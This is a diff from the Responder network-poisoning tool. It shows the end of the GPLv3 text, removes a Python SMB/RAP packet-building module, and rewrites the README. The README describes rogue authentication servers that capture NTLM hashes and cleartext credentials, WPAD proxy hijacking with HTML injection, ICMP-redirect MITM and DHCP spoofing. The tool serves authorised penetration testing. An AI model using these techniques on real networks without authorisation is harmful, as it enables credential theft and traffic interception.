||||||
|
any patent claim is infringed by making, using, selling, offering for
|
||||||
|
sale, or importing the Program or any portion of it.
|
||||||
|
|
||||||
|
11. Patents.
|
||||||
|
|
||||||
|
A "contributor" is a copyright holder who authorizes use under this
|
||||||
|
License of the Program or a work on which the Program is based. The
|
||||||
|
work thus licensed is called the contributor's "contributor version".
|
||||||
|
|
||||||
|
A contributor's "essential patent claims" are all patent claims
|
||||||
|
owned or controlled by the contributor, whether already acquired or
|
||||||
|
hereafter acquired, that would be infringed by some manner, permitted
|
||||||
|
by this License, of making, using, or selling its contributor version,
|
||||||
|
but do not include claims that would be infringed only as a
|
||||||
|
consequence of further modification of the contributor version. For
|
||||||
|
purposes of this definition, "control" includes the right to grant
|
||||||
|
patent sublicenses in a manner consistent with the requirements of
|
||||||
|
this License.
|
||||||
|
|
||||||
|
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||||
|
patent license under the contributor's essential patent claims, to
|
||||||
|
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||||
|
propagate the contents of its contributor version.
|
||||||
|
|
||||||
|
In the following three paragraphs, a "patent license" is any express
|
||||||
|
agreement or commitment, however denominated, not to enforce a patent
|
||||||
|
(such as an express permission to practice a patent or covenant not to
|
||||||
|
sue for patent infringement). To "grant" such a patent license to a
|
||||||
|
party means to make such an agreement or commitment not to enforce a
|
||||||
|
patent against the party.
|
||||||
|
|
||||||
|
If you convey a covered work, knowingly relying on a patent license,
|
||||||
|
and the Corresponding Source of the work is not available for anyone
|
||||||
|
to copy, free of charge and under the terms of this License, through a
|
||||||
|
publicly available network server or other readily accessible means,
|
||||||
|
then you must either (1) cause the Corresponding Source to be so
|
||||||
|
available, or (2) arrange to deprive yourself of the benefit of the
|
||||||
|
patent license for this particular work, or (3) arrange, in a manner
|
||||||
|
consistent with the requirements of this License, to extend the patent
|
||||||
|
license to downstream recipients. "Knowingly relying" means you have
|
||||||
|
actual knowledge that, but for the patent license, your conveying the
|
||||||
|
covered work in a country, or your recipient's use of the covered work
|
||||||
|
in a country, would infringe one or more identifiable patents in that
|
||||||
|
country that you have reason to believe are valid.
|
||||||
|
|
||||||
|
If, pursuant to or in connection with a single transaction or
|
||||||
|
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||||
|
covered work, and grant a patent license to some of the parties
|
||||||
|
receiving the covered work authorizing them to use, propagate, modify
|
||||||
|
or convey a specific copy of the covered work, then the patent license
|
||||||
|
you grant is automatically extended to all recipients of the covered
|
||||||
|
work and works based on it.
|
||||||
|
|
||||||
|
A patent license is "discriminatory" if it does not include within
|
||||||
|
the scope of its coverage, prohibits the exercise of, or is
|
||||||
|
conditioned on the non-exercise of one or more of the rights that are
|
||||||
|
specifically granted under this License. You may not convey a covered
|
||||||
|
work if you are a party to an arrangement with a third party that is
|
||||||
|
in the business of distributing software, under which you make payment
|
||||||
|
to the third party based on the extent of your activity of conveying
|
||||||
|
the work, and under which the third party grants, to any of the
|
||||||
|
parties who would receive the covered work from you, a discriminatory
|
||||||
|
patent license (a) in connection with copies of the covered work
|
||||||
|
conveyed by you (or copies made from those copies), or (b) primarily
|
||||||
|
for and in connection with specific products or compilations that
|
||||||
|
contain the covered work, unless you entered into that arrangement,
|
||||||
|
or that patent license was granted, prior to 28 March 2007.
|
||||||
|
|
||||||
|
Nothing in this License shall be construed as excluding or limiting
|
||||||
|
any implied license or other defenses to infringement that may
|
||||||
|
otherwise be available to you under applicable patent law.
|
||||||
|
|
||||||
|
12. No Surrender of Others' Freedom.
|
||||||
|
|
||||||
|
If conditions are imposed on you (whether by court order, agreement or
|
||||||
|
otherwise) that contradict the conditions of this License, they do not
|
||||||
|
excuse you from the conditions of this License. If you cannot convey a
|
||||||
|
covered work so as to satisfy simultaneously your obligations under this
|
||||||
|
License and any other pertinent obligations, then as a consequence you may
|
||||||
|
not convey it at all. For example, if you agree to terms that obligate you
|
||||||
|
to collect a royalty for further conveying from those to whom you convey
|
||||||
|
the Program, the only way you could satisfy both those terms and this
|
||||||
|
License would be to refrain entirely from conveying the Program.
|
||||||
|
|
||||||
|
13. Use with the GNU Affero General Public License.
|
||||||
|
|
||||||
|
Notwithstanding any other provision of this License, you have
|
||||||
|
permission to link or combine any covered work with a work licensed
|
||||||
|
under version 3 of the GNU Affero General Public License into a single
|
||||||
|
combined work, and to convey the resulting work. The terms of this
|
||||||
|
License will continue to apply to the part which is the covered work,
|
||||||
|
but the special requirements of the GNU Affero General Public License,
|
||||||
|
section 13, concerning interaction through a network will apply to the
|
||||||
|
combination as such.
|
||||||
|
|
||||||
|
14. Revised Versions of this License.
|
||||||
|
|
||||||
|
The Free Software Foundation may publish revised and/or new versions of
|
||||||
|
the GNU General Public License from time to time. Such new versions will
|
||||||
|
be similar in spirit to the present version, but may differ in detail to
|
||||||
|
address new problems or concerns.
|
||||||
|
|
||||||
|
Each version is given a distinguishing version number. If the
|
||||||
|
Program specifies that a certain numbered version of the GNU General
|
||||||
|
Public License "or any later version" applies to it, you have the
|
||||||
|
option of following the terms and conditions either of that numbered
|
||||||
|
version or of any later version published by the Free Software
|
||||||
|
Foundation. If the Program does not specify a version number of the
|
||||||
|
GNU General Public License, you may choose any version ever published
|
||||||
|
by the Free Software Foundation.
|
||||||
|
|
||||||
|
If the Program specifies that a proxy can decide which future
|
||||||
|
versions of the GNU General Public License can be used, that proxy's
|
||||||
|
public statement of acceptance of a version permanently authorizes you
|
||||||
|
to choose that version for the Program.
|
||||||
|
|
||||||
|
Later license versions may give you additional or different
|
||||||
|
permissions. However, no additional obligations are imposed on any
|
||||||
|
author or copyright holder as a result of your choosing to follow a
|
||||||
|
later version.
|
||||||
|
|
||||||
|
15. Disclaimer of Warranty.
|
||||||
|
|
||||||
|
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||||
|
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||||
|
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||||
|
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||||
|
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||||
|
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||||
|
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||||
|
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||||
|
|
||||||
|
16. Limitation of Liability.
|
||||||
|
|
||||||
|
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||||
|
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||||
|
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||||
|
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||||
|
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||||
|
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||||
|
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||||
|
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||||
|
SUCH DAMAGES.
|
||||||
|
|
||||||
|
17. Interpretation of Sections 15 and 16.
|
||||||
|
|
||||||
|
If the disclaimer of warranty and limitation of liability provided
|
||||||
|
above cannot be given local legal effect according to their terms,
|
||||||
|
reviewing courts shall apply local law that most closely approximates
|
||||||
|
an absolute waiver of all civil liability in connection with the
|
||||||
|
Program, unless a warranty or assumption of liability accompanies a
|
||||||
|
copy of the Program in return for a fee.
|
||||||
|
|
||||||
|
END OF TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
How to Apply These Terms to Your New Programs
|
||||||
|
|
||||||
|
If you develop a new program, and you want it to be of the greatest
|
||||||
|
possible use to the public, the best way to achieve this is to make it
|
||||||
|
free software which everyone can redistribute and change under these terms.
|
||||||
|
|
||||||
|
To do so, attach the following notices to the program. It is safest
|
||||||
|
to attach them to the start of each source file to most effectively
|
||||||
|
state the exclusion of warranty; and each file should have at least
|
||||||
|
the "copyright" line and a pointer to where the full notice is found.
|
||||||
|
|
||||||
|
<one line to give the program's name and a brief idea of what it does.>
|
||||||
|
Copyright (C) <year> <name of author>
|
||||||
|
|
||||||
|
This program is free software: you can redistribute it and/or modify
|
||||||
|
it under the terms of the GNU General Public License as published by
|
||||||
|
the Free Software Foundation, either version 3 of the License, or
|
||||||
|
(at your option) any later version.
|
||||||
|
|
||||||
|
This program is distributed in the hope that it will be useful,
|
||||||
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
GNU General Public License for more details.
|
||||||
|
|
||||||
|
You should have received a copy of the GNU General Public License
|
||||||
|
along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
|
Also add information on how to contact you by electronic and paper mail.
|
||||||
|
|
||||||
|
If the program does terminal interaction, make it output a short
|
||||||
|
notice like this when it starts in an interactive mode:
|
||||||
|
|
||||||
|
<program> Copyright (C) <year> <name of author>
|
||||||
|
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||||
|
This is free software, and you are welcome to redistribute it
|
||||||
|
under certain conditions; type `show c' for details.
|
||||||
|
|
||||||
|
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||||
|
parts of the General Public License. Of course, your program's commands
|
||||||
|
might be different; for a GUI interface, you would use an "about box".
|
||||||
|
|
||||||
|
You should also get your employer (if you work as a programmer) or school,
|
||||||
|
if any, to sign a "copyright disclaimer" for the program, if necessary.
|
||||||
|
For more information on this, and how to apply and follow the GNU GPL, see
|
||||||
|
<http://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
|
The GNU General Public License does not permit incorporating your program
|
||||||
|
into proprietary programs. If your program is a subroutine library, you
|
||||||
|
may consider it more useful to permit linking proprietary applications with
|
||||||
|
the library. If this is what you want to do, use the GNU Lesser General
|
||||||
|
Public License instead of this License. But first, please read
|
||||||
|
<http://www.gnu.org/philosophy/why-not-lgpl.html>.
|
||||||
@@ -1,160 +0,0 @@
|
|||||||
import struct
|
|
||||||
from odict import OrderedDict
|
|
||||||
|
|
||||||
def longueur(payload):
|
|
||||||
length = struct.pack(">i", len(''.join(payload)))
|
|
||||||
return length
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
|
|
||||||
class SMBHeader(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("proto", "\xff\x53\x4d\x42"),
|
|
||||||
("cmd", "\x72"),
|
|
||||||
("error-code", "\x00\x00\x00\x00" ),
|
|
||||||
("flag1", "\x08"),
|
|
||||||
("flag2", "\x01\x00"),
|
|
||||||
("pidhigh", "\x00\x00"),
|
|
||||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
||||||
("reserved", "\x00\x00"),
|
|
||||||
("tid", "\x00\x00"),
|
|
||||||
("pid", "\x3c\x1b"),
|
|
||||||
("uid", "\x00\x00"),
|
|
||||||
("mid", "\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
class SMBNegoData(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("wordcount", "\x00"),
|
|
||||||
("bcc", "\x54\x00"),
|
|
||||||
("separator1","\x02" ),
|
|
||||||
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
|
|
||||||
("separator2","\x02"),
|
|
||||||
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
CalculateBCC = str(self.fields["separator1"])+str(self.fields["dialect1"])+str(self.fields["separator2"])+str(self.fields["dialect2"])
|
|
||||||
self.fields["bcc"] = struct.pack("<h",len(CalculateBCC))
|
|
||||||
|
|
||||||
class SMBSessionData(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("wordcount", "\x0a"),
|
|
||||||
("AndXCommand", "\xff"),
|
|
||||||
("reserved","\x00"),
|
|
||||||
("andxoffset", "\x00\x00"),
|
|
||||||
("maxbuff","\xff\xff"),
|
|
||||||
("maxmpx", "\x02\x00"),
|
|
||||||
("vcnum","\x01\x00"),
|
|
||||||
("sessionkey", "\x00\x00\x00\x00"),
|
|
||||||
("PasswordLen","\x18\x00"),
|
|
||||||
("reserved2","\x00\x00\x00\x00"),
|
|
||||||
("bcc","\x3b\x00"),
|
|
||||||
("AccountPassword",""),
|
|
||||||
("AccountName",""),
|
|
||||||
("AccountNameTerminator","\x00"),
|
|
||||||
("PrimaryDomain","WORKGROUP"),
|
|
||||||
("PrimaryDomainTerminator","\x00"),
|
|
||||||
("NativeOs","Unix"),
|
|
||||||
("NativeOsTerminator","\x00"),
|
|
||||||
("NativeLanman","Samba"),
|
|
||||||
("NativeLanmanTerminator","\x00"),
|
|
||||||
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
CompleteBCC = str(self.fields["AccountPassword"])+str(self.fields["AccountName"])+str(self.fields["AccountNameTerminator"])+str(self.fields["PrimaryDomain"])+str(self.fields["PrimaryDomainTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLanman"])+str(self.fields["NativeLanmanTerminator"])
|
|
||||||
self.fields["bcc"] = struct.pack("<h", len(CompleteBCC))
|
|
||||||
self.fields["PasswordLen"] = struct.pack("<h", len(str(self.fields["AccountPassword"])))
|
|
||||||
|
|
||||||
class SMBTreeConnectData(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Wordcount", "\x04"),
|
|
||||||
("AndXCommand", "\xff"),
|
|
||||||
("Reserved","\x00" ),
|
|
||||||
("Andxoffset", "\x00\x00"),
|
|
||||||
("Flags","\x08\x00"),
|
|
||||||
("PasswdLen", "\x01\x00"),
|
|
||||||
("Bcc","\x1b\x00"),
|
|
||||||
("Passwd", "\x00"),
|
|
||||||
("Path",""),
|
|
||||||
("PathTerminator","\x00"),
|
|
||||||
("Service","?????"),
|
|
||||||
("Terminator", "\x00"),
|
|
||||||
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["PasswdLen"] = struct.pack("<h", len(str(self.fields["Passwd"])))[:2]
|
|
||||||
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
|
|
||||||
self.fields["Bcc"] = struct.pack("<h", len(BccComplete))
|
|
||||||
|
|
||||||
class RAPNetServerEnum3Data(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Command", "\xd7\x00"),
|
|
||||||
("ParamDescriptor", "WrLehDzz"),
|
|
||||||
("ParamDescriptorTerminator", "\x00"),
|
|
||||||
("ReturnDescriptor","B16BBDz"),
|
|
||||||
("ReturnDescriptorTerminator", "\x00"),
|
|
||||||
("DetailLevel", "\x01\x00"),
|
|
||||||
("RecvBuff","\xff\xff"),
|
|
||||||
("ServerType", "\x00\x00\x00\x80"),
|
|
||||||
("TargetDomain","SMB"),
|
|
||||||
("RapTerminator","\x00"),
|
|
||||||
("TargetName","ABCD"),
|
|
||||||
("RapTerminator2","\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
class SMBTransRAPData(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Wordcount", "\x0e"),
|
|
||||||
("TotalParamCount", "\x24\x00"),
|
|
||||||
("TotalDataCount","\x00\x00" ),
|
|
||||||
("MaxParamCount", "\x08\x00"),
|
|
||||||
("MaxDataCount","\xff\xff"),
|
|
||||||
("MaxSetupCount", "\x00"),
|
|
||||||
("Reserved","\x00\x00"),
|
|
||||||
("Flags", "\x00"),
|
|
||||||
("Timeout","\x00\x00\x00\x00"),
|
|
||||||
("Reserved1","\x00\x00"),
|
|
||||||
("ParamCount","\x24\x00"),
|
|
||||||
("ParamOffset", "\x5a\x00"),
|
|
||||||
("DataCount", "\x00\x00"),
|
|
||||||
("DataOffset", "\x7e\x00"),
|
|
||||||
("SetupCount", "\x00"),
|
|
||||||
("Reserved2", "\x00"),
|
|
||||||
("Bcc", "\x3f\x00"),
|
|
||||||
("Terminator", "\x00"),
|
|
||||||
("PipeName", "\\PIPE\\LANMAN"),
|
|
||||||
("PipeTerminator","\x00\x00"),
|
|
||||||
("Data", ""),
|
|
||||||
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
#Padding
|
|
||||||
if len(str(self.fields["Data"]))%2==0:
|
|
||||||
self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
|
|
||||||
else:
|
|
||||||
self.fields["PipeTerminator"] = "\x00\x00\x00"
|
|
||||||
##Convert Path to Unicode first before any Len calc.
|
|
||||||
self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
|
|
||||||
##Data Len
|
|
||||||
self.fields["TotalParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
|
|
||||||
self.fields["ParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
|
|
||||||
##Packet len
|
|
||||||
FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
|
|
||||||
|
|
||||||
self.fields["ParamOffset"] = struct.pack("<i", len(FindRAPOffset)+32)[:2]
|
|
||||||
##Bcc Buff Len
|
|
||||||
BccComplete = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
|
|
||||||
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
|
|
||||||
243
README.md
243
README.md
@@ -1,178 +1,171 @@
|
|||||||
NBT-NS/LLMNR Responder
|
# Responder.py #
|
||||||
Laurent Gaffie <lgaffie@trustwave.com>
|
|
||||||
http://www.spiderlabs.com
|
|
||||||
|
|
||||||
INTRODUCTION
|
LLMNR/NBT-NS/mDNS Poisoner
|
||||||
============
|
|
||||||
|
|
||||||
This tool is first an LLMNR and NBT-NS responder, it will answer to
|
Author: Laurent Gaffie <laurent.gaffie@gmail.com > https://g-laurent.blogspot.com
|
||||||
*specific* NBT-NS (NetBIOS Name Service) queries based on their name
|
|
||||||
suffix (see: http://support.microsoft.com/kb/163409). By default, the
|
|
||||||
tool will only answers to File Server Service request, which is for SMB.
|
|
||||||
The concept behind this, is to target our answers, and be stealthier on
|
|
||||||
the network. This also helps to ensure that we don't break legitimate
|
|
||||||
NBT-NS behavior. You can set the -r option to "On" via command line if
|
|
||||||
you want this tool to answer to the Workstation Service request name
|
|
||||||
suffix.
|
|
||||||
|
|
||||||
FEATURES
|
|
||||||
========
|
|
||||||
|
## Intro ##
|
||||||
|
|
||||||
|
Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB.
|
||||||
|
|
||||||
|
The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix.
|
||||||
|
|
||||||
|
## Features ##
|
||||||
|
|
||||||
- Built-in SMB Auth server.
|
- Built-in SMB Auth server.
|
||||||
Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default.
|
|
||||||
Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion.
|
Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default.
|
||||||
Clear text password is supported for NT4, and LM hashing downgrade when the
|
|
||||||
--lm option is set to On. This functionality is enabled by default when the
|
|
||||||
tool is launched.
|
|
||||||
|
|
||||||
- Built-in MSSQL Auth server.
|
- Built-in MSSQL Auth server.
|
||||||
In order to redirect SQL Authentication to this tool, you will need to
|
|
||||||
set the option -r to On(NBT-NS queries for SQL Server lookup are using
|
In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008.
|
||||||
the Workstation Service name suffix) for systems older than windows
|
|
||||||
Vista (LLMNR will be used for Vista and higher). This server supports
|
|
||||||
NTLMv1, LMv2 hashes. This functionality was successfully tested on
|
|
||||||
Windows SQL Server 2005 & 2008.
|
|
||||||
|
|
||||||
- Built-in HTTP Auth server.
|
- Built-in HTTP Auth server.
|
||||||
In order to redirect HTTP Authentication to this tool, you will need
|
|
||||||
to set the option -r to On for Windows version older than Vista (NBT-NS
|
In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.
|
||||||
queries for HTTP server lookup are sent using the Workstation Service
|
|
||||||
name suffix). For Vista and higher, LLMNR will be used. This server
|
Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim.
|
||||||
supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server
|
|
||||||
was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.
|
|
||||||
Note: This module also works for WebDav NTLM authentication issued from
|
|
||||||
Windows WebDav clients (WebClient). You can now send your custom files to a victim.
|
|
||||||
|
|
||||||
- Built-in HTTPS Auth server.
|
- Built-in HTTPS Auth server.
|
||||||
In order to redirect HTTPS Authentication to this tool, you will need
|
|
||||||
to set the -r option to On for Windows versions older than Vista (NBT-NS
|
Same as above. The folder certs/ contains 2 default keys, including a dummy private key. This is *intentional*, the purpose is to have Responder working out of the box. A script was added in case you need to generate your own self signed key pair.
|
||||||
queries for HTTP server lookups are sent using the Workstation Service
|
|
||||||
name suffix). For Vista and higher, LLMNR will be used. This server
|
|
||||||
supports NTLMv1, NTLMv2, *and* Basic Authentication. This server
|
|
||||||
was successfully tested on IE 6 to IE 10, Firefox, Chrome, and Safari.
|
|
||||||
The folder Cert/ was added and contain 2 default keys, including a dummy
|
|
||||||
private key. This is *intentional*, the purpose is to have Responder
|
|
||||||
working out of the box. A script was added in case you need to generate
|
|
||||||
your own self signed key pair.
|
|
||||||
|
|
||||||
- Built-in LDAP Auth server.
|
- Built-in LDAP Auth server.
|
||||||
In order to redirect LDAP Authentication to this tool, you will need
|
|
||||||
to set the option -r to On for Windows version older than Vista (NBT-NS
|
|
||||||
queries for HTTP server lookup are sent using the Workstation Service
|
|
||||||
name suffix). For Vista and higher, LLMNR will be used. This server
|
|
||||||
supports NTLMSSP hashes and Simple Authentication (clear text authentication).
|
|
||||||
This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.
|
|
||||||
|
|
||||||
- Built-in FTP Auth server.
|
In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.
|
||||||
This module will collect FTP clear text credentials.
|
|
||||||
|
|
||||||
- Built-in small DNS server. This server will answer type A queries. This
|
- Built-in FTP, POP3, IMAP, SMTP Auth servers.
|
||||||
is really handy when it's combined with ARP spoofing.
|
|
||||||
|
|
||||||
- All hashes are printed to stdout and dumped in an unique file John
|
This modules will collect clear text credentials.
|
||||||
Jumbo compliant, using this format:
|
|
||||||
(SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt
|
|
||||||
The file will be located in the current folder.
|
|
||||||
|
|
||||||
- Responder will logs all its activity to a file Responder-Session.log.
|
- Built-in DNS server.
|
||||||
|
|
||||||
- When the option -f is set to "On", Responder will fingerprint every host who issued
|
This server will answer type A queries. This is really handy when it's combined with ARP spoofing.
|
||||||
an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode.
|
|
||||||
|
|
||||||
- Browser Listener finds the PDC in stealth mode.
|
- Built-in WPAD Proxy Server.
|
||||||
|
|
||||||
- Icmp Redirect for MITM on Windows XP/2003 and earlier Domain members. This attack combined with
|
This module will capture all HTTP requests from anyone launching Internet Explorer on the network if they have "Auto-detect settings" enabled. This module is highly effective. You can configure your custom PAC script in Responder.conf and inject HTML into the server's responses. See Responder.conf.
|
||||||
the DNS module is pretty effective.
|
|
||||||
|
|
||||||
- WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is higly effective. You can now send your custom Pac script to a victim and inject HTML into the server's responses. See Responder.conf. This module is now enabled by default.
|
- Browser Listener
|
||||||
|
|
||||||
- Responder is now using a configuration file. See Responder.conf.
|
This module allows to find the PDC in stealth mode.
|
||||||
|
|
||||||
- Built-in POP3 auth server. This module will collect POP3 plaintext credentials
|
- Fingerprinting
|
||||||
|
|
||||||
- Built-in SMTP auth server. This module will collect PLAIN/LOGIN clear text credentials.
|
When the option -f is used, Responder will fingerprint every host who issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode.
|
||||||
|
|
||||||
CONSIDERATIONS
|
- Icmp Redirect
|
||||||
==============
|
|
||||||
|
|
||||||
- This tool listen on several port: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433,
|
python tools/Icmp-Redirect.py
|
||||||
TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.
|
|
||||||
If you run Samba on your system, stop smbd and nmbd and all other
|
|
||||||
services listening on these ports.
|
|
||||||
For Ubuntu users:
|
|
||||||
Edit this file /etc/NetworkManager/NetworkManager.conf and comment the line : "dns=dnsmasq".
|
|
||||||
Then kill dnsmasq with this command (as root): killall dnsmasq -9
|
|
||||||
|
|
||||||
- Any rogue server can be turn off in Responder.conf.
|
For MITM on Windows XP/2003 and earlier Domain members. This attack combined with the DNS module is pretty effective.
|
||||||
|
|
||||||
- You can set a network interface via command line switch -I. Default is all.
|
- Rogue DHCP
|
||||||
|
|
||||||
|
python tools/DHCP.py
|
||||||
|
|
||||||
|
DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL.
|
||||||
|
|
||||||
|
- Analyze mode.
|
||||||
|
|
||||||
|
This module allows you to see NBT-NS, BROWSER, LLMNR, DNS requests on the network without poisoning any responses. Also, you can map domains, MSSQL servers, workstations passively, see if ICMP Redirects attacks are plausible on your subnet.
|
||||||
|
|
||||||
|
## Hashes ##
|
||||||
|
|
||||||
|
All hashes are printed to stdout and dumped in an unique file John Jumbo compliant, using this format:
|
||||||
|
|
||||||
|
(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt
|
||||||
|
|
||||||
|
Log files are located in the "logs/" folder. Hashes will be logged and printed only once per user per hash type, unless you are using the Verbose mode (-v).
|
||||||
|
|
||||||
|
- Responder will logs all its activity to Responder-Session.log
|
||||||
|
- Analyze mode will be logged to Analyze-Session.log
|
||||||
|
- Poisoning will be logged to Poisoners-Session.log
|
||||||
|
|
||||||
|
Additionally, all captured hashed are logged into an SQLite database which you can configure in Responder.conf
|
||||||
|
|
||||||
|
|
||||||
|
## Considerations ##
|
||||||
|
|
||||||
|
- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
|
||||||
|
|
||||||
|
- If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
|
||||||
|
|
||||||
|
- For Ubuntu users:
|
||||||
|
|
||||||
|
Edit this file /etc/NetworkManager/NetworkManager.conf and comment the line: `dns=dnsmasq`. Then kill dnsmasq with this command (as root): `killall dnsmasq -9`
|
||||||
|
|
||||||
|
- Any rogue server can be turned off in Responder.conf.
|
||||||
|
|
||||||
- This tool is not meant to work on Windows.
|
